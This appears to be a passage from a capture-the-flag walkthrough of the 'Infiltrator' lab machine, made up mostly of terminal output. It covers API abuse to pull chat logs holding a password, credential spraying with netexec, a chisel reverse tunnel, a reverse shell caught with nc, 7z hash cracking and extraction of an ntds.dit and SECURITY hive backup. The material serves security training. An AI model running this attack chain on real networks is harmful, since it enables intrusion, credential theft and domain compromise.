³ ³ network13_16.png

³ ³ network14_16.png

³ ³ network15_16.png
³ ³ network16_16.png

³ ³ network17_16.png

³ ³ network1_16.png

³ ³ network2_16_2.png

³ ³ network3_16.png

³ ³ network4_16.png

³ ³ network5_16.png

³ ³ network6_16.png

³ ³ network7_16.png

³ ³ network8_16.png

³ ³ network9_16.png

³ ³ plus_math_20.png

³ ³ plus_math_20_b.png

³ ³ poll_multi_tick.png

³ ³ poll_multi_tick_w.png

³ ³ poll_tick.png

³ ³ poll_tick_w.png

³ ³ [Link]

³ ³ [Link]

³ ³ trash_14.png

³ ³ trash_14_red.png

³ ³

³ ÃÄÄÄDrive

³ ÃÄÄÄProfile

³ ³ UP1_A_1.png

³ ³ UP9_WS_9.png

³ ³

³ ÀÄÄÄReceived Files

ÀÄÄÄTheme
*Anurag-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download
OM.db3

Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OM.db3 to


OM.db3

Info: Download successful!

*Anurag-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download


OT.db3

Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OT.db3 to


OT.db3

Info: Download successful!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# file *.db3

OM.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter
33, database pages 29, cookie 0xf, schema 4, UTF-8, version-valid-for 33

OT.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 8,
database pages 13, cookie 0x6, schema 4, UTF-8, version-valid-for 8

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#sqlite3 OT.db3

SQLite version 3.45.1 2024-01-30 16:01:20

Enter ".help" for usage hints.

sqlite> .tables

om_project om_project_task_users om_task_status

om_project_task om_task_settings om_task_type

sqlite> select * from om_project;

sqlite> select * from om_project_task;

sqlite> select * from om_project_task_users;

sqlite> select * from om_task_settings;


leave_user_sync_date|2024-02-19T22:32:29.643Z

calendar_user_settings|{"Approvers":[],"ApprovedUsers":"","LeaveTypes":[{"Id":1,"Name":"Casual",
"Color":"#339966","IsDefault":true},{"Id":2,"Name":"Sick","Color":"#00CCFF","IsDefault":true}],"Cale
ndar":{"OfficeStartTime":"09:00
AM","NonWorkingDays":["Sunday"],"IsViewDepartmentLeaveOnly":false,"DeleteLeave":12,"Holidays
":[]}}

sqlite> select * from om_task_status;

sqlite> select * from om_task_type;

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#sqlite3 OM.db3

SQLite version 3.45.1 2024-01-30 16:01:20

Enter ".help" for usage hints.

sqlite> .tables

om_chatroom om_drive_files om_preset_message

om_chatroom_user om_escape_message om_reminder

om_custom_group_new om_hide_usergroup om_settings

om_custom_group_user_new om_notes om_user_master

om_custom_status om_notes_user om_user_photo

sqlite> .schema om_chatroom

CREATE TABLE [om_chatroom] (

[chatroom_id] INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,

[chatroom_name] NVARCHAR(50),

[chatroom_key] NVARCHAR(50),

[chatroom_new_name] NVARCHAR(100),

[photo_key] NVARCHAR(100),

[chatroom_new_key] NVARCHAR(100),

[chatroom_notification] BOOLEAN,

[updated_date] DATETIME,

[leave_room] BOOLEAN,
[admin_only_chat] BOOLEAN,

[last_message_date] DATETIME,

[is_remote_server] BOOLEAN,

[remote_server_id] INTEGER,

[is_active] BOOLEAN,

[last_message_id] NVARCHAR(50),

[pin_message] NTEXT

);

sqlite> select chatroom_name, chatroom_key from om_chatroom;

chatroom_name|chatroom_key

General_chat|20240219160702@[Link]

Chiefs_Marketing_chat|20240220014618@[Link]
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains curl localhost:14125

ProxyChains-3.1 ([Link]

|S-chain|-<>-[Link]:1080-<><>-[Link]:14125-<><>-OK

{"Message":"No HTTP resource was found that matches the request URI
'[Link] route data was found for this request."}

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains curl localhost:14125/api/users

ProxyChains-3.1 ([Link]

|S-chain|-<>-[Link]:1080-<><>-[Link]:14125-<><>-OK

{"Message":"Request is missing authorization token."}


┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG"


localhost:14125/api/users

ProxyChains-3.1 ([Link]

|S-chain|-<>-[Link]:1080-<><>-[Link]:14125-<><>-OK

{"rows":[{"user":"admin","displayname":"Admin","group":"Administration","role":"A","email":"","ph
one":"","title":"","status":"online"},{"user":"[Link]","displayname":"[Link]","group":"Mar
keting Team","role":"U","email":"anderson@[Link]","phone":"+0 123 443
699","title":"Marketing","status":"offline"},{"user":"[Link]","displayname":"[Link]","group":"Market
ing Team","role":"U","email":"clark@[Link]","phone":"+0 123 443
699","title":"Marketing","status":"offline"},{"user":"[Link]","displayname":"[Link]","group":"De
velopers","role":"U","email":"harris@[Link]","phone":"+0 123 443
699","title":"Developer","status":"offline"},{"user":"[Link]","displayname":"[Link]","group
":"Others","role":"U","email":"martinez@[Link]","phone":"","title":"Chief Marketing
Officer","status":"online"},{"user":"[Link]","displayname":"[Link]","group":"Others","role":"U",
"email":"walker@[Link]","phone":"","title":"Co
Founder","status":"offline"},{"user":"[Link]","displayname":"[Link]","group":"QA
Testers","role":"U","email":"turner@[Link]","phone":"","title":"QA
Tester","status":"offline"},{"user":"[Link]","displayname":"[Link]","group":"Digital
Influencer Marketing","role":"U","email":"rodriguez@[Link]","phone":"+0 123 443
699","title":"Digital
Influencer","status":"offline"},{"user":"winrm_svc","displayname":"winrm_svc","group":"Manageme
nt and Security","role":"U","email":"winrm_svc@[Link]","phone":"+0 123 443
699","title":"Services
Management","status":"online"},{"user":"Developer_01","displayname":"Developer_01","group":"D
evelopers","role":"U","email":"Developer_01@[Link]","phone":"","title":"Developer","status
":"offline"},{"user":"Developer_02","displayname":"Developer_02","group":"Developers","role":"U",
"email":"Developer_02@[Link]","phone":"","title":"Developer_02","status":"offline"},{"user"
:"Developer_03","displayname":"Developer_03","group":"Developers","role":"U","email":"Develope
r_03@[Link]","phone":"","title":"Developer_03","status":"offline"}],"success":true}

┌──(root㉿kali)-[/home/anurag/Downloads] proxychains -q curl -H "API-KEY:


558R501T5I6024Y8JV3B7KOUN1A518GG" localhost:14125/api/chatrooms -s | jq .

"rows": [

"room": "Chiefs_Marketing_chat",

"roomusers": "[Link]|0,[Link]|0"

},

"room": "Dev_Chat",

"roomusers":
"Admin|0,[Link]|0,[Link]|0,Developer_01|0,Developer_02|0,Developer_03|0"

},

"room": "General_chat",

"roomusers":
"Admin|0,[Link]|0,[Link]|0,[Link]|0,[Link]|0,[Link]|0,[Link]|0,[Link]|0,win
rm_svc|0,Developer_01|0,Developer_02|0,Developer_03|0"

},

{
"room": "Marketing_Team_chat",

"roomusers": "[Link]|0,[Link]|0"

],

"success": true

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG"


localhost:14125/api/chatrooms/Chiefs_Marketing_chat -s | jq .

"row": {

"room": "Chiefs_Marketing_chat",

"roomusers": "[Link]|0,[Link]|0"

},

"success": true

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG"


'localhost:14125/api/chatrooms/logs?roomkey=20240220014618@[Link]'

{"success":false,"message":"logs chatroom does not exists!"}

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG"


'localhost:14125/api/chatrooms/logs?roomkey=20240220014618@[Link]&fromdate=2010
/01/01&todate=2024/09/01'

{"success":true,"logs":"\u003cstyle\u003e\n*, *:before, *:after {\nbox-sizing: border-box;\n}\na


{\ntext-decoration:none;\ncolor: black;\n}\na:link,a:visited,a:hover,a:active {\ncolor:
black;\n}\n.room_log{\nfont-family: \"Open Sans\" ,Segoe UI,Calibri,Candara,Arial,sans-serif;\nfont-
size: 13px;\nfont-weight: 400;\ncolor: #333;\nbackground-color: #fff;\n}\n.room_log p {\nmargin:
0px;\npadding: 0px;\nline-height: 20px;\n}\n.room_log #greybk {\nbackground-color:
#f7f7f7;\nclear: both;\nwidth: 100%;\nfloat: left;\n}\n.room_log #whitebk {\nbackground-color:
#fcfcfc;\nclear: both;\nwidth: 100%;\nfloat: left;\n}\n.room_log .nickname {\nclear: both;\ncolor:
#A1A1A1;\nfloat: left;\nwidth: 70%;\n}\n.room_log .currentusernickname {\nclear: both;\ncolor:
#319aff;\nfloat: left;\nwidth: 70%;\n}\n.room_log .msg_time, .room_log .msg_timeorange
{\npadding: 2px 0p 0px 5px;\nclear: right;\nfloat: right;\nfont-size: 12px;\ncolor: #A1A1A1;\nwidth:
30%;\ntext-align: right;\n}\n.room_log .msg_timeorange {\ncolor: #f98c01;\n}\n.room_log
.msg_body {\ncolor: #000000;\nfloat: left;\npadding: 0px 0px 5px 5px;\nwidth:
96%;\noverflow:auto;\n}\n.room_log .msg_leftgc{\ncolor: #A1A1A1;\nfont-size: 12px;\nfloat:
right;\nfont-weight: bold;\npadding-bottom: 5px;\n}\n#whitebk.msg_leftgc,
#greybk.msg_leftgc{\ntext-align:right;\n}\n.room_log .msg_signout {\ncolor: #0072c6;\nfloat:
right;\nfont-weight: bold;\npadding-bottom: 5px;\n}\n.room_log .unreadmsg {\nfloat:
right;\npadding: 5px 6px 0px 0px;\nwidth: 18px;\n}\n.room_log .datefont {\nfont-size: 17px;\nfont-
weight: bold;\ncolor: #686667;\ntext-align: center;\nword-wrap: break-word;\n}\n.room_log
.monthfont {\nfont-size: 12px;\nfont-weight: bold;\ncolor: #686667;\ntext-align: left;\nword-wrap:
break-word;\n}\n.room_log .datebox {\nwidth: 38px;\nbackground-color: #e0e0e0;\ntext-align:
center;\ntext-color: #686667;\nword-wrap: break-word;\nfloat: right;\n}\n.room_log .dashedline
{\nmargin-top: 26px;\nborder-top: 1px dashed #d8d8d8;\nbackground-color: #FFFFFF;\nheight:
1px;\nwidth: 100%;\n}\n.room_log .highlighttext {\nbackground-color: lime;\nfont-weight:
bold;\ntext-color: white;\n}\n.room_log .logfromname {\npadding-top: 4px;\nvertical-align:
middle;\ncolor: #397dba;\nclear: both;\ndisplay: box;\n}\n.room_log .logdateorange {\ncolor:
#ff9104;\nfont-size: 11px;\nfont-weight: italic;\nfloat: left;\npadding-top: 5px;\nclear: both;\nheight:
25px;\nwidth: 50%;\n}\n.room_log [Link] {\nvertical-align: middle;\n}\n.room_log [Link]
{\nvertical-align: bottom;\n}\n/*** Bullets ***/\n.room_log .bullet {\nfloat: left;\nposition:
relative;\nwidth: 5px;\nheight: 15px;\nmargin: 0px 0px 0px 15px;\noverflow: hidden;\nclear:
both;\n}\n.room_log .bullet img {\nvertical-align: middle;\nposition: absolute;\ntop: 60%;\nleft:
0px;\n}\n.room_log .bullet [Link] {\nmargin-left: -6px;\n}\n.room_log .bullet [Link]-delivered
{\n}\n.room_log .bullet [Link] {\nmargin-left: -12px;\n}\n.room_log .sep {\npadding: 0 0 0
0;\nclear: both;\n}\n/*** End Bullets ***/\n/*** Emotions ***/\n.room_log .emotion {\nwidth:
16px;\nheight: 16px;\noverflow: hidden;\nposition: relative;\ndisplay: inline-block;\n}\n.room_log
.emotion img {\nposition: absolute;\nleft: -5px;\ntop: -5px;\n}\n.room_log .e_whistle {\nwidth:
17px;\nheight: 17px;\n}\n.room_log .e_brb {\nwidth: 17px;\nheight: 17px;\n}\n.room_log .e_secret
{\nwidth: 19px;\nheight: 19px;\n}\n/*First Row*/\n.room_log .emotion [Link] {\n}\n.room_log
.emotion img.very_happy {\nmargin-left: -25px;\n}\n.room_log .emotion img.baring_teeth
{\nmargin-left: -50px;\n}\n.room_log .emotion [Link] {\nmargin-left: -75px;\n}\n.room_log
.emotion [Link] {\nmargin-left: -100px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
125px;\n}\n.room_log .emotion img.tonque_out {\nmargin-left: -150px;\n}\n.room_log .emotion
[Link] {\nmargin-left: -175px;\n}\n/*Second Row*/\n.room_log .emotion [Link] {\nmargin-
top: -25px;\n}\n.room_log .emotion [Link] {\nmargin-left: -25px;\nmargin-top: -
25px;\n}\n.room_log .emotion img.i_dont_know {\nmargin-left: -50px;\nmargin-top: -
25px;\n}\n.room_log .emotion [Link] {\nmargin-left: -75px;\nmargin-top: -
25px;\n}\n.room_log .emotion [Link] {\nmargin-left: -100px;\nmargin-top: -
25px;\n}\n.room_log .emotion [Link] {\nmargin-left: -125px;\nmargin-top: -25px;\n}\n.room_log
.emotion img.dont_tell_anyone {\nmargin-left: -150px;\nmargin-top: -25px;\n}\n.room_log .emotion
[Link] {\nmargin-left: -175px;\nmargin-top: -25px;\n}\n/*Third Row*/\n.room_log .emotion
[Link] {\nmargin-top: -51px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
25px;\nmargin-top: -51px;\n}\n.room_log .emotion [Link] {\nmargin-left: -50px;\nmargin-top: -
51px;\n}\n.room_log .emotion [Link] {\nmargin-left: -75px;\nmargin-top: -51px;\n}\n.room_log
.emotion [Link] {\nmargin-left: -100px;\nmargin-top: -51px;\n}\n.room_log .emotion [Link]
{\nmargin-left: -125px;\nmargin-top: -51px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
150px;\nmargin-top: -51px;\n}\n.room_log .emotion [Link] {\nmargin-left: -175px;\nmargin-top:
-51px;\n}\n/*Forth Row*/\n.room_log .emotion [Link] {\nmargin-top: -78px;\n}\n.room_log
.emotion [Link] {\nmargin-left: -25px;\nmargin-top: -78px;\n}\n.room_log .emotion [Link]
{\nmargin-left: -50px;\nmargin-top: -78px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
75px;\nmargin-top: -78px;\n}\n.room_log .emotion [Link] {\nmargin-left: -100px;\nmargin-top: -
78px;\n}\n.room_log .emotion img.birthday_cake {\nmargin-left: -125px;\nmargin-top: -
78px;\n}\n.room_log .emotion [Link] {\nmargin-left: -150px;\nmargin-top: -78px;\n}\n.room_log
.emotion img.broken_heart {\nmargin-left: -175px;\nmargin-top: -78px;\n}\n/*Fifth
Row*/\n.room_log .emotion [Link] {\nmargin-top: -106px;\n}\n.room_log .emotion [Link]
{\nmargin-left: -25px;\nmargin-top: -103px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
50px;\nmargin-top: -105px;\n}\n.room_log .emotion [Link] {\nmargin-left: -75px;\nmargin-top: -
105px;\n}\n.room_log .emotion [Link] {\nmargin-left: -100px;\nmargin-top: -
105px;\n}\n.room_log .emotion img.clapping_hands {\nmargin-left: -125px;\nmargin-top: -
105px;\n}\n.room_log .emotion img.fingers_crossed {\nmargin-left: -150px;\nmargin-top: -
105px;\n}\n.room_log .emotion [Link] {\nmargin-left: -175px;\nmargin-top: -105px;\n}\n/*Sixth
Row*/\n.room_log .emotion [Link] {\nmargin-top: -130px;\n}\n.room_log .emotion
img.wilted_rose {\nmargin-left: -25px;\nmargin-top: -130px;\n}\n.room_log .emotion [Link]
{\nmargin-left: -50px;\nmargin-top: -130px;\n}\n.room_log .emotion [Link] {\nmargin-left: -
75px;\nmargin-top: -130px;\n}\n.room_log .emotion [Link] {\nmargin-left: -100px;\nmargin-top: -
130px;\n}\n.room_log .emotion [Link] {\nmargin-left: -125px;\nmargin-top: -
130px;\n}\n.room_log .emotion img.thumbs_up {\nmargin-left: -150px;\nmargin-top: -
130px;\n}\n.room_log .emotion img.thumbs_down {\nmargin-left: -175px;\nmargin-top: -
130px;\n}\n/*** End Emotions ***/\n#subject{\nborder:1px solid #A2E5FF;\nbackground-
color:#C7EDFC;\npadding:5px 10px;\nwidth:100%;\nFONT-FAMILY: Segoe UI;\nfont-
size:12px;\n}\n.notify_container{\nfloat:left;\nclear:both;\nwidth:100%;\npadding:10px
0px;\n}\[Link]{\nfloat:left;\npadding:5px 0px 5px 5px;\nbackground-
color:#C7EDFC;\ncolor:Black;\nwidth:100%;\n}\[Link]
.nickname{\ncolor:#000000;\n}\n#greybk.notify_container, #whitebk.notify_container{\npadding-
top:0px; \n}\[Link] {\nborder-left:3px solid green;\npadding-left:5px;\nmargin-
top:2px;\nmargin-bottom:5px;\nbackground-
color:#f5f5f5;\nfloat:left;\nwidth:100%;\n}\n.reply_name {\ncolor:green;\nfont-size:
14px;\n}\n.reply_message {\ntext-overflow: ellipsis;\nwidth: 100%;\nheight:20px;\nwhite-space:
nowrap;\noverflow: hidden;\ntext-overflow: ellipsis;\n}\n.reply_file
{\nfloat:left;\ndisplay:none;\nheight:40px;\nvertical-align:middle; \ntext-
align:center;\nposition:absolute;\nleft: 10px;\ntop: 2px;\n}\n.reply_file img {\nposition:
absolute;\nmargin: auto;\ntop: 0;\nleft: 0;\nright: 0;\nbottom:
0;\n}\n.reply_container{\nfloat:left;\nwidth:100%;\nbox-sizing: border-box;\n}\n.reply_container
.msg_time {\nfont-size: 10px;\npadding-right: 10px;\npadding-top: 3px;\n}\n
\u003c/style\u003e\u003cdiv class=\u0027room_log\u0027\u003e\u003cdiv
class=\u0027logdateorange\u0027\u003e20/02/2024\u003c/div\u003e\u003cdiv
class=\u0027datebox\u0027\u003e \u003cspan
class=\u0027datefont\u0027\u003e20\u003cbr\u003e\u003c/span\u003e\u003cspan
class=\u0027monthfont\u0027\u003eFeb\u003c/span\u003e\u003c/div\u003e\u003cbr\u003e\u0
03cbr\u003e\u003cdiv id=\u0027greybk\u0027\u003e\u003cdiv
class=\u0027logfromName\u0027\u003e\u003cimg src=\u0027/temp/hash_dark_20.png\u0027
class=\u0027middle\u0027 title=\u0027\u0027 /\u003e Chiefs_Marketing_chat: [Link],
[Link]\u003c/div\u003e\u003c/div\u003e\u003cbr\u003e\u003cdiv
id=\u0027greybk\u0027\u003e\u003cspan class=\u0027nickname\u0027 \[Link] Says:
\u003c/span\u003e\u003cdiv class=\u0027msg_time\u0027\u003e02:05
AM\u003c/div\u003e\u003cbr /\u003e\u003cdiv class=\u0027bullet\u0027\u003e\u003cimg
src=\u0027/Temp/[Link]\u0027 class=\u0027read\u0027 title=\u0027\u0027
/\u003e\u003c/div\u003e\u003cdiv class=\u0027msg_body\u0027 \u003eHey, hope you\u0027re
doing well! What tasks do you have on your plate today?\u003c/div\u003e\u003cbr
/\u003e\u003c/div\u003e\u003cdiv id=\u0027greybk\u0027\u003e\u003cspan
class=\u0027nickname\u0027 \[Link] Says: \u003c/span\u003e\u003cdiv
class=\u0027msg_time\u0027\u003e02:06 AM\u003c/div\u003e\u003cbr /\u003e\u003cdiv
class=\u0027bullet\u0027\u003e\u003cimg src=\u0027/Temp/[Link]\u0027
class=\u0027read\u0027 title=\u0027\u0027 /\u003e\u003c/div\u003e\u003cdiv
class=\u0027msg_body\u0027 \u003eThanks! I\u0027m working on the new marketing campaign
and reviewing the budget for Q4. How about you?\u003c/div\u003e\u003cbr
/\u003e\u003c/div\u003e\u003cdiv id=\u0027greybk\u0027\u003e\u003cspan
class=\u0027nickname\u0027 \[Link] Says: \u003c/span\u003e\u003cdiv
class=\u0027msg_time\u0027\u003e02:08 AM\u003c/div\u003e\u003cbr /\u003e\u003cdiv
class=\u0027bullet\u0027\u003e\u003cimg src=\u0027/Temp/[Link]\u0027
class=\u0027read\u0027 title=\u0027\u0027 /\u003e\u003c/div\u003e\u003cdiv
class=\u0027msg_body\u0027 \u003eSounds busy! By the way, I need to check something in your
account. Could you share your username password?\u003c/div\u003e\u003cbr
/\u003e\u003c/div\u003e\u003cdiv id=\u0027greybk\u0027\u003e\u003cspan
class=\u0027nickname\u0027 \[Link] Says: \u003c/span\u003e\u003cdiv
class=\u0027msg_time\u0027\u003e02:09 AM\u003c/div\u003e\u003cbr /\u003e\u003cdiv
class=\u0027bullet\u0027\u003e\u003cimg src=\u0027/Temp/[Link]\u0027
class=\u0027read\u0027 title=\u0027\u0027 /\u003e\u003c/div\u003e\u003cdiv
class=\u0027msg_body\u0027 \u003esure!\u003c/div\u003e\u003cbr
/\u003e\u003c/div\u003e\u003cdiv id=\u0027greybk\u0027\u003e\u003cspan
class=\u0027nickname\u0027 \[Link] Says: \u003c/span\u003e\u003cdiv
class=\u0027msg_time\u0027\u003e02:09 AM\u003c/div\u003e\u003cbr /\u003e\u003cdiv
class=\u0027bullet\u0027\u003e\u003cimg src=\u0027/Temp/[Link]\u0027
class=\u0027read\u0027 title=\u0027\u0027 /\u003e\u003c/div\u003e\u003cdiv
class=\u0027msg_body\u0027 \[Link] : m@rtinez@1996!\u003c/div\u003e\u003cbr
/\u003e\u003c/div\u003e\u003c/div\u003e"}

{"success":true,"logs": "[HTML data]"}

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG"


'localhost:14125/api/chatrooms/logs?roomkey=20240220014618@[Link]&fromdate=2010
/01/01&todate=2024/09/01' -s | jq .logs -r > Chiefs_Marketing_chat.html
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'm@rtinez@1996!'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\[Link]:m@rtinez@1996!


STATUS_LOGON_FAILURE

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec winrm [Link] -u [Link] -p 'm@rtinez@1996!'

WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [-] [Link]\[Link]:m@rtinez@1996!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#netexec rdp [Link] -u [Link] -p 'm@rtinez@1996!'

RDP [Link] 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763
(name:DC01) (domain:[Link]) (nla:True)

RDP [Link] 3389 DC01 [-] [Link]\[Link]:m@rtinez@1996!


(STATUS_LOGON_FAILURE)
*Anurag-WinRM* PS C:\programdata> .\[Link] client [Link]:8000 R:14121:[Link]:14121
R:14125:[Link]:14125 R:14126:[Link]:14126

[Link] : 2024/09/07 06:21:13 client: Connecting to [Link]

2024/09/07 06:21:13 client: Connected (Latency 29.8624ms)


*Anurag-WinRM* PS C:\programdata> upload ping_test.bat

Info: Uploading /media/sf_CTFs/hackthebox/infiltrator-[Link]/ping_test.bat to


C:\programdata\ping_test.bat

Data: 28 bytes of 28 bytes copied


Info: Upload successful!

*Anurag-WinRM* PS C:\programdata> type ping_test.bat

ping -n 1 [Link]

*Anurag-WinRM* PS C:\programdata> .\ping_test.bat

C:\programdata>ping -n 1 [Link]

Pinging [Link] with 32 bytes of data:

Reply from [Link]: bytes=32 time=22ms TTL=63

Ping statistics for [Link]:

Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 22ms, Maximum = 22ms, Average = 22ms

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#sudo tcpdump -ni tun0 icmp

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

09:32:56.496522 IP [Link] > [Link]: ICMP echo request, id 1, seq 1909, length 40

09:32:56.496531 IP [Link] > [Link]: ICMP echo reply, id 1, seq 1909, length 40
09:35:54.651952 IP [Link] > [Link]: ICMP echo request, id 1, seq 1914, length 40

09:35:54.651968 IP [Link] > [Link]: ICMP echo reply, id 1, seq 1914, length 40

*Anurag-WinRM* PS C:\programdata> upload [Link]

Info: Uploading /media/sf_CTFs/hackthebox/infiltrator-[Link]/[Link] to


C:\programdata\[Link]

Data: 1796 bytes of 1796 bytes copied

Info: Upload successful!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#rlwrap -cAr nc -lnvp 443

Listening on [Link] 443

Connection received on [Link] 50279


PS C:\Windows\system32> whoami

infiltrator\[Link]

PS C:\Users\[Link]\appdata\roaming\Output Messenger\FAAA\Received Files\203301> ls

Directory: C:\Users\[Link]\appdata\roaming\Output Messenger\FAAA\Received Files\203301

Mode LastWriteTime Length Name

---- ------------- ------ ----

-a---- 2/23/2024 4:10 PM 292244 network_capture_2024.pcapng

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#netexec smb [Link] -u [Link] -p 'M@rtinez_P@ssw0rd!'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:M@rtinez_P@ssw0rd!

┌──(root㉿kali)-[/home/anurag/Downloads] netexec winrm [Link] -u [Link] -p


'M@rtinez_P@ssw0rd!'

WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [-] [Link]\[Link]:M@rtinez_P@ssw0rd!

┌──(root㉿kali)-[/home/anurag/Downloads] netexec rdp [Link] -u [Link] -p


'M@rtinez_P@ssw0rd!'

RDP [Link] 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763
(name:DC01) (domain:[Link]) (nla:True)

RDP [Link] 3389 DC01 [+] [Link]\[Link]:M@rtinez_P@ssw0rd!


(Pwn3d!)

┌──(root㉿kali)-[/home/anurag/Downloads]
└─#7z x BitLocker-backup.7z

...[snip]...

Enter password (will not be echoed):

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# /opt/john/run/[Link] BitLocker-backup.7z | tee [Link]

ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting
these hashes

BitLocker-backup.7z:$7z$2$19$0$$16$3e870837c60379...[snip]...6fddb8ec64fc2539a$792371$10

$ hashcat [Link] --user /opt/SecLists/Passwords/Leaked-Databases/[Link]

hashcat (v6.2.6) starting in autodetect mode

...[snip]...

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.

The following mode was auto-detected as the only one matching your input hash:

11600 | 7-Zip | Archive

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!

Do NOT report auto-detect issues unless you are certain of the hash type.

This hash-mode is known to emit multiple valid candidates for the same hash.

Use --keep-guessing to continue attack after finding the first crack.

...[snip]...

$7z$2$19$0$$16$3e870837c60379...[snip]...:zipper

...[snip]...

┌──(root㉿kali)-[/home/anurag/Downloads] 7z l BitLocker-backup
...[snip]...

Date Time Attr Size Compressed Name

------------------- ----- ------------ ------------ ------------------------

2024-02-19 14:11:00 D.... 0 0 BitLocker-backup

2024-02-20 08:51:45 ....A 792371 209056 BitLocker-backup/Microsoft account _ Clés de


récupération [Link]

------------------- ----- ------------ ------------ ------------------------

2024-02-20 08:51:45 792371 209056 1 files, 1 folders

E:\>powershell

Windows PowerShell

Copyright (C) Microsoft Corporation. All rights reserved.

PS E:\> Compress-Archive -Path 'E:\Windows Server 2012 R2 - Backups\' -DestinationPath


C:\ProgramData\[Link]

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# unzip -l [Link]

Archive: [Link]

Length Date Time Name

--------- ---------- ----- ----

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\Files\

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\PerfLogs\

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\Program\

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\Program Files (x86)\

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\Users\

0 2024-09-07 08:08 Windows Server 2012 R2 - Backups\Windows\

2055137 2024-02-25 06:23 Windows Server 2012 R2 -


Backups\Users\Administrator\Documents\Backup_Credentials.7z
208 2024-02-24 20:47 Windows Server 2012 R2 -
Backups\Users\Administrator\Favorites\[Link]

461 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\Administrator\Links\[Link]

906 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\Administrator\Links\[Link]

363 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\Administrator\Links\[Link]

208 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\[Link]\Favorites\[Link]

461 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\[Link]\Links\[Link]

906 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\[Link]\Links\[Link]

363 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\[Link]\Links\[Link]

208 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\[Link]\Favorites\[Link]

461 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\[Link]\Links\[Link]

906 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\[Link]\Links\[Link]

363 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\[Link]\Links\[Link]

208 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\winrm_svc\Favorites\[Link]

461 2024-02-24 20:47 Windows Server 2012 R2 - Backups\Users\winrm_svc\Links\[Link]

906 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\winrm_svc\Links\[Link]

363 2024-02-24 20:47 Windows Server 2012 R2 -


Backups\Users\winrm_svc\Links\[Link]

--------- -------

2062889 23 files

┌──(root㉿kali)-[/home/anurag/Downloads]
└─#7z l Windows\ Server\ 2012\ R2\ -\
Backups/Users/Administrator/Documents/Backup_Credentials.7z

...[snip]...

Date Time Attr Size Compressed Name

------------------- ----- ------------ ------------ ------------------------


2024-02-25 10:12:32 D.... 0 0 Active Directory

2024-02-25 10:12:34 D.... 0 0 registry

2024-02-25 10:12:34 ....A 35667968 2054887 Active Directory/[Link]

2024-02-25 10:00:07 ....A 262144 registry/SECURITY

